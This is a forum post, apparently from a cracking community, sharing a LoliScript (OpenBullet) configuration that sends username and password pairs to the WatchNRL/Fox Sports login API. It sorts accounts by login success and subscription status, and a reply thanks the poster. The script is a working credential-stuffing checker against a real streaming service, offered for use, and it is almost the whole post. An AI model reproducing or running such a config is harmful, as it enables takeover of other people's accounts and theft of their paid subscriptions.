Sign in to follow this  
sYdr1b

WatchNRL | CAP | LoliScript

Recommended Posts

[hide]

REQUEST POST "https://vimond-rest-api.ha.foxsport-second.vimondtv.com/api/authentication/user/login"

 "{\"login\":{\"username\":\"\",\"password\":\"\"}}"

 ACCEPT "application/json"

 UA "WatchNRL/1.4.0 (iPhone; iOS 11.3.1; Scale/3.00)"

 CONTENTTYPE "application/json"

 HEADER "Host: vimond-rest-api.ha.foxsport-second.vimondtv.com"

 HEADER "Connection: keep-alive"

 HEADER "Accept-Language: en-US;q=1"

 HEADER "Accept-Encoding: br, gzip, deflate"

 HEADER "x-vimond-tenant: watchnrl"

PARSE HEADER "Authorization" -> VAR "Authorization"

KEYCHECK

  KEYCHAIN FAILURE OR

    KEY "AUTHENTICATION_FAILED" SOURCE

  KEYCHAIN SUCCESS OR

    KEY "AUTHENTICATION_OK" SOURCE

 

REQUEST GET "https://www.watchnrl.com/account/manage-subscription?required=true"

 ACCEPT "application/json;v=2"

 UA "WatchNRL/1.4.0 (iPhone; iOS 11.3.1; Scale/3.00)"

 CONTENTTYPE "application/json"

 HEADER "Host: vimond-rest-api.ha.foxsport-second.vimondtv.com"

 HEADER "Connection: keep-alive"

 HEADER "Accept-Language: en-US;q=1"

 HEADER "Accept-Encoding: br, gzip, deflate"

 HEADER "x-vimond-tenant: watchnrl"

PARSE SOURCE JSON "uri" -> VAR "URI"

 

REQUEST GET "https://vmndapi.foxsports.com.au/api/web/productgroup/649/products"

 ACCEPT "application/json;v=2"

  UA "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"

 CONTENTTYPE "application/json;v=2"

 HEADER "Origin: https://www.watchnrl.com"

 HEADER "Referer: https://www.watchnrl.com/account/manage-subscription?required=true"

 HEADER "x-vimond-tenant: watchnrl"

KEYCHECK

  KEYCHAIN FREE OR

    NKEY "Cancel and go to profile page" SOURCE

[/hide]

Share this post


Link to post
Share on other sites

Thank you so much for sharing this, need the NRL!

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this